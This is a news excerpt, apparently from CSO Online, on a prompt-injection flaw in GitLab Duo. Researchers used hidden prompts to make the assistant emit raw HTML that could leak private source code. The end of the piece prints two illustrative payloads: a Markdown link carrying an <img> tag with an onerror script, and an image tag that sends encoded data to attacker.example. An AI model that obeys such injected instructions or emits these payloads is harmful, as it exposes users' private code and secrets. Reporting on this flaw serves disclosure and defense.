AI prompt injection leads to HTML injection: Duo sends responses to users in an HTML-based chatbot interface that uses Markdown to format text. The researchers observed that its answers were rendered progressively as they streamed in from the backend LLM, which gave them the idea that if they managed to inject HTML tags through a prompt, the browser would render and interpret them.

“At this point, we realized that we could already craft malicious Markdown URLs and have them displayed to the user,” the researchers stated. “So, we asked: what if the URL’s label itself contained raw HTML? If Duo renders responses in real time, the browser might interpret that HTML before any proper sanitization kicks in.”

The test worked with a prompt that asked the AI assistant to insert a URL whose label rendered as an <img> HTML tag. IMG tags in HTML can load images from an external server, but they can also carry JavaScript code, and so can FORM and A tags. (Illustrative sketches of this payload and of the exfiltration step that follows appear below.)

This newfound ability to execute arbitrary HTML in the user’s browser gave the researchers another idea. Since most GitLab users also have access to private projects, an attacker who can find out the URL of such a private project can piggyback on the user’s permissions to read code from it, encode it, and send it back to a server under their control; in other words, leak sensitive and private source code. This becomes even more critical if the attacker can determine the location of a file in the repository that contains secrets, such as API tokens or other credentials.

“This security flaw shows how powerful and risky AI assistants like GitLab Duo can be when they blindly trust content from the page,” the researchers wrote. “By sneaking in hidden prompts and raw HTML, we were able to make Duo leak private source code without the user clicking a single thing.”

GitLab patched the HTML injection by preventing Duo from rendering risky tags like <img> or <form> that point to domains other than gitlab.com. However, the other prompt injection scenarios that did not involve HTML rendering remain unpatched, as GitLab does not consider them security issues because they do not directly result in unauthorized access or code execution.
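To make the first technique concrete, a Markdown link whose label smuggles in raw HTML could look something like the minimal sketch below. This is a hypothetical illustration of the class of payload the researchers describe, not their actual exploit; the tag, attributes, and URLs are invented.

```markdown
<!-- Hypothetical payload: the link label carries a raw <img> tag whose
     onerror attribute runs attacker-supplied JavaScript if the label is
     rendered by the browser before sanitization. -->
[click here<img src="https://attacker.example/x.png" onerror="alert(document.domain)">](https://gitlab.com)
```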
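The exfiltration step could, in principle, be as simple as an injected image tag whose source URL carries the encoded data: when the victim’s browser renders the response, it fetches the image and thereby delivers the payload to the attacker’s server with no click required. Again, the hostname, path, and query parameter below are invented for illustration.

```markdown
<!-- Hypothetical: the assistant is tricked into emitting this tag after
     reading a private file. Requesting the image "leaks" the Base64-encoded
     contents (here, "password=hunter2") to the attacker's server. -->
<img src="https://attacker.example/collect?d=cGFzc3dvcmQ9aHVudGVyMg==">
```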
First seen on csoonline.com
Jump to article: www.csoonline.com/article/3992845/prompt-injection-flaws-in-gitlab-duo-highlights-risks-in-ai-assistants.html